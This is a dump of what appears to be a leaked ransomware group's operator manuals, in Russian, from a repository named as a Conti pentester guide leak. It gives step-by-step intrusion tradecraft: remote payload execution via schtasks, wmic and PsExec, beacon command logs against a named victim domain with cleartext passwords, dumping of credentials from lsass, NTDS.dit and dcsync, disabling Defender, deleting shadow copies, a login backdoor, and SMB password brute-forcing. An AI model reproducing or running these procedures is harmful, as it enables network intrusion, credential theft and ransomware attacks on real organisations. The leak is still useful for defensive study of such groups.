2 | 1)shell SCHTASKS /s MS040926754153 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00 3 | 2)shell SCHTASKS /s MS040926754153 /run /TN "WindowsSensor15" 4 | 3)shell schtasks /S MS040926754153 /TN "WindowsSensor15" /DELETE /F 5 | вместо 6 | MS040926754153 7 | вставляешь 8 | ипак тачки 9 | по очереди команды долбишь 10 | 1) создание таска с пейлоадом 11 | 2) врубание 12 | 3) удаление 13 | 14 | 15 | Запуск ВМИКОМ им пользуемся чаще 16 | 1)если это ДЛЛ, то 17 | shell wmic /node:192.168.104.13 process call create "rundll32.exe C:\ProgramData\x64.dll StartW" 18 | 19 | Соответсвенно где айпи, вставляем айпи машины на котрую имеем доступ, дальше идет путь и название нашей длл, думаю синтаксис понятен 20 | 21 | Если вы находитесь на РДП > открыаем CMD от администратора и rundll32.exe C:\ProgramData\x64.dll,StartW сотвественно путь можете указать любой, в соотвествии где лежит ваша длл 22 | 23 | 24 | Для EXE формата или формата .bat запуск ВМИКОМ такой 25 | 26 | shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe" 27 | 28 | 29 | 30 | Так же можно загружать и запускать через метасплойт, но мы сейчас крайне редко пользуемся запуском и загрузкой при помщи этого интсрумента, так как в последней версии работает не коректно -------------------------------------------------------------------------------- /MANUALS/Личная безопасность.txt: -------------------------------------------------------------------------------- 1 | Я думаю каждый тут работает через виртуалку. Поэтому советую установить виртуалку на закриптованный том с помощью VeraCrypt. 2 | 1 качаем Veracrypt 3 | 2 надо будет выделить место на вашем диске под файл / или закриптить сразу весь диск 4 | Важное правило - устанавливать виртуалку придется заново, тк к сожалению при криптовании вашей старой рабочей виртуалки возникнет непреодалимая ошибка в коде и она уже не запуститься. Это не болшая проблема, ибо вы сможете достать все свои файлы из образа вашей старой виртуалки через 7ZIP. 5 | 6 | Не забудь сохранить пассы для входа в этот чат или джабер Токио, ибо если ты это потеряешь, то уже никто тебе не поможет вернуться. 7 | 8 | (если кто сможет найти способ без установки новой ОС, отпишите пожалуйста исправлю) -------------------------------------------------------------------------------- /MANUALS/МАНУАЛ.txt: -------------------------------------------------------------------------------- 1 | ПЕРЕХОДИМ В АГЕНТА: 2 | ПРАВОЙ КНОПКОЙ МЫШИ ПО АГЕНТУ И ЖМЕМ INTERACT 3 | 4 | 1)ПОСМОТРЕТЬ СПИСОК АДМИНИСТРАТОРОВ shell net group "domain admins" /domain 5 | 6 | 2)ИМЯ ДОМЕНА shell net view /all /domain 7 | 8 | 3)ПОСМОТРЕТЬ СПИСОК DC shell nltest /dclist:"NameDomain" 9 | 10 | 4)УЗНАТЬ СПИСОК СЕРВЕРОВ 11 | ПОДГРУЖАЕМ МОДУЛЬ PowerView 12 | ПРАВОЙ КОНОПКОЙ МЫШИ ПО АГЕНТУ Get Info > Get Servers 13 | ПОЛУЧИЛИ СПИСОК СЕРВЕРОВ 14 | 15 | 5)УЗНАТЬ СПИСОК КОМПЬЮТЕРОВ 16 | ТАК КАК МОДУЛЬ PowerView УЖЕ ПОДГРУЖЕН 17 | ПРАВОЙ КОНОПКОЙ МЫШИ ПО АГЕНТУ Get Info > Get All Computers 18 | ПОЛУЧИЛИ СПИСОК КОМПЬТЕРОВ 19 | 20 | 6)НАДО УЗНАТЬ ПАРОЛИ ВСЕХ АДМИНОВ ДОМЕНА 21 | ПРАВОЙ КНОПКОЙ МЫШИ ПО АГЕНТУ 22 | ЖМЕМ ACCESS > DUMP HASHES 23 | ПЕРЕХОДИМ ВЫШЕ ВКЛАДКА VIEW > CREDENTIALS 24 | ЗАБИРАЕМ ВСЕ ХЕШИ И ИЩЕМ АДМИНОВ ДОМЕНА 25 | 26 | 7)НАДО НАЙТИ NAS , BACKUP 27 | ЭТОЙ КОМАНДОЙ МЫ УЗНАЕМ ВСЕ ПОДСЕТИ ДАННОГО ДОМЕНА powershell Get-NetSubnet 28 | СЛЕДУЩЕЙ КОМАНДОЙ НУЖНО УЗНАТЬ НА КАКОМ IP АДРЕССЕ НАХОДИТСЯ NAS , BACKUP 29 | portscan 107.191.177.1-107.191.177.255 5000 icmp 1024 30 | 31 | СПИСОК ПОЛЕЗНЫХ КОММАНД КОТОРЫЕ МОГУ ПРИГОДИТЬСЯ: 32 | 33 | СНЯТЬ ПРАВА АГЕНТА ДО ДЕФОЛТА rev2self 34 | ВКЛЮЧИТЬ ЮЗЕРА ЧЕРЕЗ ЦМД shell net user Администратор /active:yes 35 | ИНФОРМАЦИЯ О ПОЛЬЗОВАТЕЛЕ shell net user careadmin /domain 36 | ВКЛЮЧИТЬ RDP СОЕДИНЕНИЕ shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 37 | ОТКЛЮЧЕНИЕ ДЕФЕНДЕРА powershell Set-MpPreference -DisableRealtimeMonitoring $true 38 | ОБНОВЛЕНИЕ ПОЛИТИК shell repadmin /syncall /AdeP 39 | ПОКАЗАТЬ ТРАСТЫ ДОМЕНОВ shell nltest /domain_trusts /all_trusts 40 | ЗАПУСК ПРОГРАММЫ НА ДРУГОМ ПК shell wmic /node:"ИМЯ ПК" process call create "КОМАНДА КОТОРУЮ НАДО ВЫПОЛНИТЬ" -------------------------------------------------------------------------------- /MANUALS/Мануал робота с AD DC.txt: -------------------------------------------------------------------------------- 1 | 2 | C:\Windows\System32\config\sam 3 | C:\Windows\System32\config\security 4 | C:\Windows\System32\config\system 5 | ------------------> в этих файлах хранится такая информация, как хешированные пароли всех учетных записей пользователей Windows, 6 | параметры, связанные с безопасностью, данные о ключах шифрования и прочие важные сведения о конфигурации ядра ОС. 7 | 8 | sleep 5 9 | ps 10 | cd C:\ProgramData 11 | AV_Query 12 | powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1 13 | powershell Get-DomainController 14 | powershell Get-DomainComputer -Properties dnshostname 15 | powershell Get-DomainComputer -OperatingSystem *server* -Properties dnshostname 16 | shell net group "domain Admins" /domain 17 | shell net group "Enterprise Admins" /domain 18 | logonpasswords 19 | shell nltest /DOMAIN_TRUSTS 20 | make_token FMH\maysys 34stb4y@345 21 | dcsync FMH 22 | upload /home/tester/Desktop/payload/x64.dll (\\FMH-DC01.FMH.local\C$\ProgramData\x64.dll) 23 | remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\x64.dll StartW 24 | rm \\FMH-DC01.FMH.local\C$\ProgramData\x64.dll 25 | upload /home/tester/Desktop/FMH/x64.dll (\\FMH-DC01.FMH.local\C$\ProgramData\x64.dll) 26 | upload /home/tester/Desktop/FMH/tlt.dll (\\FMH-DC01.FMH.local\C$\ProgramData\tlt.dll) 27 | remote-exec wmi FMH-DC01 rundll32.exe C:\ProgramData\tlt.dll StartW 28 | rm \\FMH-DC01.FMH.local\C$\ProgramData\tlt.dll 29 | rm \\FMH-DC01.FMH.local\C$\ProgramData\x64.dll 30 | rev2self 31 | make_token FMH.local\Administrator 34stb4y*.* 32 | powershell-import /opt/PowerSploit-dev/Recon/ShareFinder.ps1 33 | powerpick Invoke-ShareFinder -Ping -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\share.txt 34 | download C:\ProgramData\share.txt 35 | rm C:\ProgramData\share.txt 36 | dcsync FMH.local 37 | upload /home/tester/Desktop/FMH/tlt.dll (\\OPERA-APP.FMH.local\C$\ProgramData\tlt.dll) 38 | remote-exec wmi OPERA-APP.FMH.local rundll32.exe C:\ProgramData\tlt.dll StartW 39 | rm \\OPERA-APP.FMH.local\C$\ProgramData\tlt.dll 40 | sleep 0 41 | net domain_controllers 42 | net domain_trusts 43 | shell whoami /all 44 | shell hostname 45 | powershell get-adcomputer -filter * | select -expand name 46 | upload /home/host/Desktop/1.bat (C:\ProgramData\1.bat) 47 | shell cd c:\programata 48 | ls 49 | powershell get-adcomputer -filter * -properties passwordlastset | select name, ipv4address, passwordlastset | sort passwordlastset 50 | 51 | 52 | shell 1.bat 53 | echo FMH-DC01 1>>c:\programdata\qu.txt 54 | quser /server:FMH-DC01 1>>c:\programdata\qu.txt 55 | 56 | powershell Get-ADComputer -Filter 'operatingsystem -notlike "*server*" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\workstations.txt 57 | powershell Get-ADComputer -Filter 'operatingsystem -notlike "*server*" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize 58 | ls 59 | upload /home/host/Desktop/2.bat (C:\ProgramData\2.bat) 60 | echo OPERA-APP 1>>c:\programdata\qu.txt 61 | quser /server:OPERA-APP 1>>c:\programdata\qu.txt 62 | powershell Get-ADComputer -Filter 'operatingsystem -like "*server*" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize 63 | ls 64 | 65 | 66 | beacon> upload /home/host/Desktop/3.bat (C:\ProgramData\3.bat) 67 | shell 3.bat 68 | echo FMH-DC01 1>>c:\programdata\sh.txt 69 | net view \\FMH-DC01 /all 1>>c:\programdata\sh.txt 70 | powershell get-adcomputer -filter * -properties passwordlastset | select name, ipv4address, passwordlastset | sort passwordlastset 71 | download C:\ProgramData\ts.txt 72 | download c:\programdata\sh.txt 73 | shell dir \\192.168.1.82\c$ 74 | shell whoami 75 | rev2self 76 | make_token MH.local\backups Riverd0gs1 77 | shell dir \\192.168.1.82\c$ 78 | ********************************************ДРУГАЯ ТАЧКА****************** 79 | sleep 5 80 | ps 81 | logonpasswords 82 | shell systeminfo /s FMH-EXCH01 83 | rev2self 84 | make_token FMH.local\Administrator 34stb4y*.* 85 | sleep 0 86 | shell dir \\192.168.1.82\c$ 87 | shell quser /server:192.168.1.89 88 | shell net user scott.geer /dom 89 | shell tasklist /s 192.168.1.89 90 | download \\192.168.1.89\c$\users\scott.geer\AppData\Local\Google\Chrome\User Data\Default\History 91 | download \\192.168.1.89\c$\users\scott.geer\AppData\Local\Google\Chrome\User Data\Default\Login Data 92 | shell ping FMH-BACKUPS02 93 | shell quser /server:FMH-BACKUPS02 94 | shell quser /server:192.168.1.132 95 | shell ping 192.168.1.132 96 | ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 97 | 98 | get-adcomputer -filter * | select -expand name | out-file c:\programdata\hosts.txt 99 | 100 | 101 | 102 | Get-ADComputer -Filter 'operatingsystem -notlike "windows" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\other.txt 103 | 104 | 105 | Get-ADComputer -Filter 'operatingsystem -like "server" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\servers.txt 106 | 107 | 108 | Get-ADComputer -Filter 'operatingsystem -notlike "server" -and enabled -eq "true"' ` -Properties Name,Operatingsystem,IPv4Address,LastLogonDate | Sort-Object -Property Operatingsystem | Select-Object -Property Name,Operatingsystem,IPv4Address,LastLogonDate | Format-Table -AutoSize | out-file c:\programdata\workstations.txt 109 | 110 | этими скриптами снимаем и парсим хосты, которые есть в сетке 111 | щас запущу пару бат файлов, чтобы посмотреть, какие процессы крутяться, где какие пользки сидят, все доступные шары на хостах 112 | 113 | ***************************************************************************************************************************************************************** 114 | берем данные из host.txt 115 | чтобы сделать бат файл 116 | делается так 117 | echo FMH-DC01 >> c:\programdata\qu.txt 118 | quser /server:FMH-DC01 >> c:\programdata\qu.txt 119 | и так с каждым хостом, который есть из вывода 120 | вс это пакуем в файл с расширение .bat и запускаем на хосте через cmd, либо шелл в КС shell 1.bat 121 | лучше всего запускать от ДА -домен админ, чтобы был доступ по rpc к каждому доступному хосту в AD 122 | ----------------------------------------------------------------------------------------------------------------------------------------------------------------- 123 | This tool can make a shadow copy of ntds.dit and system files 124 | 1)vssadmin create shadow /for=C: 125 | 126 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\programdata 127 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\programdata 128 | для дампа нтс файла 129 | Sven ты спраишивал как тихо снимать 130 | но все равно некоторые сильные аверы могут это детектить, типо софоса, сентинела или от palo alto 131 | либо такой способ 132 | PS C:\> ntdsutil 133 | C:\Windows\system32\ntdsutil.exe: activate instance ntds 134 | Active instance set to "ntds". 135 | C:\Windows\system32\ntdsutil.exe: ifm 136 | ifm: help 137 | 138 | ? - Show this help information 139 | Create Full %s - Create IFM media for a full AD DC or an AD/LDS instance into folder %s 140 | Create Full NoDefrag %s - Create IFM media without defragmenting for a full AD DC or an AD/LDS instance into folder %s 141 | Create RODC %s - Create IFM media for a Read-only DC into folder %s 142 | Create Sysvol Full %s - Create IFM media with SYSVOL for a full AD DC into folder %s 143 | Create Sysvol Full NoDefrag %s - Create IFM media with SYSVOL and without defragmenting for a full AD DC into folder %s Create Sysvol RODC %s - Create IFM media with SYSVOL for a Read-only DC into folder %s 144 | Help - Show this help information 145 | Quit - Return to the prior menu 146 | 147 | ifm: create full C:\pwdadmin 148 | /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// -------------------------------------------------------------------------------- /MANUALS/Меняем RDP порт.txt: -------------------------------------------------------------------------------- 1 | # add firewall rules 2 | New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow 3 | New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow 4 | # add to registry new port 5 | Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350 6 | # powershell 7 | Restart-Service termservice -force 8 | 9 | Меняем RDP порт -------------------------------------------------------------------------------- /MANUALS/ОТКЛЮЧЕНИЕ ДЕФЕНДЕРА ВРУЧНУЮ.txt: -------------------------------------------------------------------------------- 1 | gpedit.msc 2 | Внутри переходим по пути Конфигурация компьютера - Административные шаблоны - Компоненты Windows - Windows Defender 3 | находим пункт "Защита в режиме реального времени": 4 | Там выбираем пункт "Выключить защиту в режиме реального времени" и тыркнуть в него два раза кнопкой мышки: 5 | После чего выбрать кружочек "Включено"и нажать в OK. 6 | 7 | всё всегда запускаем от Администратора: 8 | uac - удаляет всплыв окна запроса разрешения на запуск от админа 9 | defoff - килл дефендер (работает не на всём, проверяем после в taskmgr наличие процесса Mspeng) 10 | RDP - поднимает 3389 порт 11 | 12 | 13 | del - delete Shadow copy (запрашивает разрешение на удаление, жмем - y) 14 | NS - монтируем скрытые системные диски (пасс:98) !! юзать после сноса АВ 15 | 16 | NLA+BACK - поправляет NLA + бэкдор для входа в систему без пароля, работает так: 17 | в окне входа (там где просит ввести креды) - жмём win+Y всплывает окно cmd 18 | пишем taskmgr, открываем вкладку юзерс, ПКМ по любому юзеру - конект 19 | p.s - на десятках не работает \ требует пасс 20 | 21 | 22 | В АРХИВЕ ОТКЛЮЧЕНИЕ РАЗЛИЧНЫХ АВ- ПАСС:9SealG -------------------------------------------------------------------------------- /MANUALS/ПЕРВОНАЧАЛЬНЫЕ ДЕЙСТВИЯ.txt: -------------------------------------------------------------------------------- 1 | ПЕРВОНАЧАЛЬНЫЕ ДЕЙСТВИЯ 2 | 3 | 1) Снятие AD - позволяет нам узнать сколько в сети серверов и воркстанций, так же информация о пользователелях , у кого какая должность и тд, псле снятия ад мы делаем sorted, чтоб отсортировать только то, что нам нужно - это вам покажем позже 4 | 2) Снятие шар (sharfinder) - при помощи него, мы смотрим, куда у нас есть доступ с этим пользователем (на другие пк) 5 | 3) Керберос атака - дергает хэши из под памяти, при удачном снятии и удачном расхэшивании - ДоменАдмин нам обеспечен 6 | 4) Если у нас есть system права, при помощи команды "hashdump" и "logonpasswords" мы можем сдернуть хэши и мимикадз и у нас будут уже пороли доменного пользователя ,а бывает что и домен админа 7 | 5) Если мы нашли логин и хэш домен админа и при этом хэш мы не смогли расхэшить , мы делаем такую команду pth Domain\Admin pass(в виде хэша) , при помощи команду shell dir \\ip или имя хоста\c$ проверим доступ на сервер или воркстанций 8 | 6) Если мы нашли логин\пасс домен админа или пользака, можем одеть его токен, команда выглядит так make_token Domain\Admin Pass , если хотите снять токен , команда rev2self 9 | 7) Если на сессии есть процесс system , при помощи команды getsystem можно поднять систменые права на сесии, пункт (4) 10 | 8) Так же не забывайте смотреть процессы при помощи команды ps, там можно найти пользователя, мигрировать в его процесс > Explore > Process list > далее выбираем процесс пользователя (пользователь должен быть другой, не тот,что на сесии) и нажимаем inject,выбираем листенер SSL 11 | 9) После миграции в новго пользователя вам так же нужно снять шары, чтобы посмотреть куда с ним можно проломиться 12 | 10) Когда вы снимаете шары, то по окончанию снятия в директорию C:\ProgramData и там лежит sh.txt или shares.txt ,скачиваем, смотрим сколько есть "remote admin" в текстовике, если их больше одного, то это означает что доступ есть на другой комп 13 | 11) Нажимаем на сессии > File Browser > пишем путь \\айпи или хостнейм компа на который есть доступ\c$ , кладем туда пелойд, я его похже выдам 14 | 12) Запуска пелойда зависит от его формата ехе или длл , по запуска я потом лично обьясню 15 | 13) Пинговать сервера и воркстанции так , нам нужен p.bat,я его скину в группу. Создаем тхт, называем его domains.txt,складываем туда хостнеймы серверов или ворков. Хостнеймы беруться со снятого АД, при помощи скрипты, им покажем как пользоваться 16 | 14) Если вы нашли какой то пороль, можно его так же прогнать через smb_login - это инстурмент в metasploit, я выдам метасплойт и расскажу как им пользоваться . смб_логин покажет на какие сервера или ворки, есть доступ с этими кредами 17 | 18 | -------------------------------------------------------------------------------- /MANUALS/ПОВИЩЕНИЯ ПРИВИЛЕГИЙ.txt: -------------------------------------------------------------------------------- 1 | стопка мануалов по повышению прав, кто плохо знает английский переводим тут ---> deepl.com 2 | 3 | github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#active-directory-exploitation-cheat-sheet -------------------------------------------------------------------------------- /MANUALS/ПРОСТАВЛЕНИЕ.txt: -------------------------------------------------------------------------------- 1 | СБОР БАТНИКА НА КОПИРОВАНИЕ ФАЙЛА ПО ВСЕМУ ДОМЕНУ 2 | start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\PRIMARY ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe" "C:\windows\temp\" 3 | СОХРАНЯЕМ КАК "COPY.BAT" 4 | 5 | СБОР БАТНИКА НА ЗАПУСК ФАЙЛА ПО ВСЕМУ ДОМЕНУ 6 | start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe 7 | СОХРАНЯЕМ КАК "EXE.BAT" 8 | 9 | СБОР БАТНИКА WMI НА КОПИРОВАНИЕ И ЗАПУСК ФАЙЛА ПО ВСЕМУ ДОМЕНУ 10 | start wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\ДОМЕН КОНТРОЛЛЕР\share$\fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe" 11 | СОХРАНЯЕМ КАК "WMI.BAT" -------------------------------------------------------------------------------- /MANUALS/Получение доступа к серверу с бекапами Shadow Protect SPX (StorageCraft).txt: -------------------------------------------------------------------------------- 1 | Получение доступа к серверу с бекапами Shadow Protect SPX (StorageCraft) 2 | == 3 | 1. Заходим по RDP на один из серваков, в моем случае это SQL сервер. 4 | 2. на рабочем столе видим иконку софтины ShadowProtect SPX 5 | -> кликаем на нее 6 | 3. открывается gui (если запросит креды, вводим те под которыми зашли по рдп, или любого иного ДА) 7 | 4. Слева в блоке "Job Summary" видим подробное описание схемы бекапов 8 | в поле "Name" - название бекапа нашего сервера 9 | в поле "Destination" - место КУДА наш spx складывает бекапы, в виде ИМЯ_БА_СЕРВАКА (ШАРА С БЕКАПОМ НА ЭТОМ СЕРВАКЕ) 10 | из нашего примера можем сделать вывод что все бекапы сохраняются в шару с названием StorageCraft, а папки с бекапами серверов именуются названием самого сервера. 11 | 5. Зная имя бекап сервера, мы хотим получить больше представления о его структура, первым делом получаем шары командой "cmd.exe> net view \\COH-DSS3 /ALL", в ответ получаем "Error 5: Access Denied" 12 | 6. Доступа нету, пробуем стучаться учетками другими ДА - ответ тот же - ошибка н 5, логично будет предположить, что чтобы получить доступ к серверу нам нужны либо креды локального админа на этом самом серваке, либо же аккаунт особого пользователя с выделенными правами 13 | 7. Предположим что если это выделенный юзер, то он имеет схожее с софтиной\функцией имя: 14 | перебираем логины с вхождением подстрок(тут нам нужно включить фантазию): 15 | Storage 16 | Shadow 17 | Protect 18 | Craft 19 | SP 20 | SPX 21 | Backup 22 | BUUser 23 | И Т.Д. 24 | после чего делаем поиск по ntds.dit (hashes.txt.ntds) для поиска хеша, в моем случае поиск завершился успехом и я нашел юзера Humanity.local\SPAdmin (думаю тут ясно что это Shadow Protect Admin) и его хеш ce31b806821bec116ba03132ab5b3138, НО к сожалению поиск на cmd5.org не дал результата, а мне позарез нужен клирпас. (Если вам хватает хеша, то поздравляю - вы достигли результата) 25 | 8. Но если все же вам нужен клирпас или вы не смогли найти подходящего юзера, мы поймем что если софтина как то стучиться на сервак то креды ей известны, а значит они могли остаться на сервере. 26 | Пробуем сделать дамп хешей 27 | тут подробно расписывать не буду как это сделать, но вы должны попробовать hashdump(и его легитимные аналоги) и logonpasswords(и аналоги) 28 | В моем случае я воспользовался мимиком и сдампил лсасс, в котором нашел клирпас от моей учетки SPAdmin - kerberos : 29 | * Username : SPAdmin 30 | * Domain : COHBackup 31 | * Password : Backup!User 32 | (в моем случае почему то домен был не Humanity.local а COHBackup, хотя вы можете постучаться и с Humanity.local(заменить на свое значение)) 33 | 9. Переходим в проводник, и открываем через него необходимую шару "\\COH-DSS3\StorageCraft" у меня запрашивает креды, я ввожу COHBackup\SPAdmin и Backup!User и успешно получаю доступ 34 | 10. Так же в некоторых сетках бекап серверов может быть несколько, как вариант проверить это, это нажать на кнопку Backup в левом верхнем углу гуи(сразу после File) далее - Destinations -> и увидим какие есть пути для сохранения бекапов 35 | === -------------------------------------------------------------------------------- /MANUALS/Рабочая станция на работу через Tor сетїь.txt: -------------------------------------------------------------------------------- 1 | Далее (для тех кто еще это не сделал) я предлагаю перевести всю рабочую станцую на работу через Tor сеть. 2 | 3 | Для того, чтобы это сделать вам нужно будет настроить вашу ОС и Whonix (это ОС создающая для вас "безопасный тунель в Tor" (подробнее можете почитать) (в 90% это будет kali), поэтому вот инструкция. 4 | 5 | https://defcon.ru/penetration-testing/405/ 6 | 7 | После данный действий у меня появилась проблема - Tor over Tor, хотя я и следовал инструкции. Поэтому вот способ решения, который мне помог: https://www.whonix.org/wiki/Other_Operating_Systems#Configure_Tor_Browser_Settings 8 | 9 | Там развернете на том же месте, куда вас выкинет вкладку Expand. -------------------------------------------------------------------------------- /MANUALS/Рабочий скрипт создания VPS сервера для тестирования на проникноваение от A до Z.txt: -------------------------------------------------------------------------------- 1 | https://xss.is/threads/53632/ - возможно будет полезно 2 | #* рабочий скрипт создания VPS сервера для тестирования на проникноваение от A до Z -------------------------------------------------------------------------------- /MANUALS/СМБ АВТОБРУТ.txt: -------------------------------------------------------------------------------- 1 | ```SMB AUTOBRUT 2 | Входными данными для проведений данной атаки являются исключительно пароли. 3 | - те, которые сдампились с браузера CharpChrome'ом 4 | - те, которые сдампились SeatBeltom 5 | - те, которые сдампились в процессе проведения работ внутри сети (мимикатцем итд) 6 | И вцелом любые другие, например найденные записанными в файлах 7 | 8 | Если подобных паролей меньше чем мы можем запустить в брутфорс атаку - дополняем смело их из следующего списка наиболее частно встречающихся в корпоративной среде. 9 | 10 | Password1 11 | Hello123 12 | password 13 | Welcome1 14 | banco@1 15 | training 16 | Password123 17 | job12345 18 | spring 19 | food1234 20 | 21 | 22 | Также рекомендуем использовать списки паролей основывающиеся на временах года и текущем годе. Учитывая что пароли меняются раз в три месяца - можно брать "запас" для генерации такого листа. 23 | Например в Августе 2020 года мы создаем список следующего содержания 24 | 25 | June2020 26 | July2020 27 | August20 28 | August2020 29 | Summer20 30 | Summer2020 31 | June2020! 32 | July2020! 33 | August20! 34 | August2020! 35 | Summer20! 36 | Summer2020! 37 | 38 | Все пароли выше попадают либо в 3 из 4 требований к паролям Актив Директори (чего хватает для их установки пользователями), либо во все 4 требования. 39 | Прим. рассматриваем наиболее популярный вариант требований. 40 | 41 | 42 | 43 | Сценарий с домен администраторами 44 | 1. Собираем список доменных администраторов командой shell net group "domain admins" /dom 45 | Полученные данные записываем в файл 46 | admins.txt 47 | 48 | 2. Заливаем этот файл на хост в папку C:\ProgramData 49 | 50 | 3. Запрашиваем информацию по доменной политике блокировки аккаунтов (защиты от брутфорса) 51 | 52 | beacon> shell net accounts /dom 53 | 54 | 55 | Tasked beacon to run: net accounts /dom 56 | host called home, sent: 48 bytes 57 | received output: 58 | 59 | 60 | The request will be processed at a domain controller for domain shookconstruction.com. 61 | Force user logoff how long after time expires?: Never 62 | Minimum password age (days): 1 63 | Maximum password age (days): 42 64 | Minimum password length: 6 65 | Length of password history maintained: 24 66 | Lockout threshold: Never 67 | Lockout duration (minutes): 30 68 | Lockout observation window (minutes): 30 69 | Computer role: BACKUP 70 | 71 | Нас интересует параметр Lockout threshold который чаще всего содержит определенное числовое значение которое в дальнейшем мы должны использовать как параметр (в данном случае стоит Never - значит что защита от перебора паролей отключена. 72 | В этом гайде в дальнейшем мы укажем значение 5 как ориентировочно чаще всего встречающееся. 73 | Параметр Minimum password length указывает на минимальное допустимое количество символов пароля, требуется для фильтрации нашего "списка" паролей который мы будем задавать. 74 | 75 | 4. В исходном коде скрипта указываем домен в котором скрипт будет запускаться 76 | - строка $context = new-object System.DirectoryServices.ActiveDirectory.DirectoryContext("Domain","shookconstruction.com") 77 | 78 | 5. Импортируем и запускаем скрипт 79 | powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1 80 | psinject 4728 x86 Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose 81 | - 4728 в данном случае это текущий пид, а х86 его разрядность 82 | - Список паролей состоит из одного который у нас был "найден" и двух из списка популярных паролей 83 | 84 | 6. Смотрим за ходом выполнения скрипта и видим результат 85 | 86 | 87 | Success! Username: Administrator. Password: 1qazXDR%+ 88 | Success! Username: CiscoDirSvcs. Password: 1qazXDR%+ 89 | 90 | 91 | 92 | Мы сбрутили двух администраторов домена. 93 | 94 | ======================================================================== 95 | 96 | Сценарий без указания списка пользователей отличается только двумя вещами. 97 | - psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 98 | Мы не указываем параметры UserList и ShowVerbose. Отсутствие первого означает то что перебор будет проводиться по ВСЕМ пользователям домена, отсутствие второе указывает на то что выводится будут только УСПЕШНЫЕ результаты. 99 | 100 | Дожидаться в видеогайде окончания работы скрипта который будет перебирать все пары пользователь/пароль в домене не буду, покажу только вывод. 101 | 102 | 103 | 104 | Success! Username: Administrator. Password: 1qazXDR%+ 105 | Success! Username: CiscoDirSvcs. Password: 1qazXDR%+ 106 | Success! Username: support. Password: 1qazXDR%+ 107 | Success! Username: accountingdept. Password: 1qazXDR%+ 108 | 109 | 110 | 111 | Как видите мы смогли найти аккаунты других пользователей которые могут быть полезны для дальнейшего продвижения по сети и поднятия прав. 112 | 113 | Если позитивного результата не будет, можно повторить через некоторое время (оптимально умножить на два параметр Lockout duration перед следующей попыткой) с новым списком паролей. 114 | Окончание работы скрипта будет отмечено выводом в бикон сообщения -------------------------------------------------------------------------------- /MANUALS/СНЯТИЕ-AD.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/СНЯТИЕ-AD.rar -------------------------------------------------------------------------------- /MANUALS/Сайт создание батникоd.txt: -------------------------------------------------------------------------------- 1 | http://tobbot.com/data/ 2 | Отлично подходит для создания команд, с последущим созданием батников -------------------------------------------------------------------------------- /MANUALS/Скрипт для sorted .rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/Скрипт для sorted .rar -------------------------------------------------------------------------------- /MANUALS/Список ТГ форумов, много интересного.txt: -------------------------------------------------------------------------------- 1 | https://t.me/peass 2 | https://t.me/antichat 3 | https://t.me/thebugbountyhunter 4 | https://t.me/club1337 5 | https://t.me/infosec1 6 | https://t.me/RalfHackerChannel 7 | https://t.me/in51d3 8 | https://t.me/exploithacker 9 | https://t.me/Premium_Hacking 10 | https://t.me/DownloadCourse14 11 | https://t.me/ViperZCrew 12 | https://t.me/techpwnews 13 | 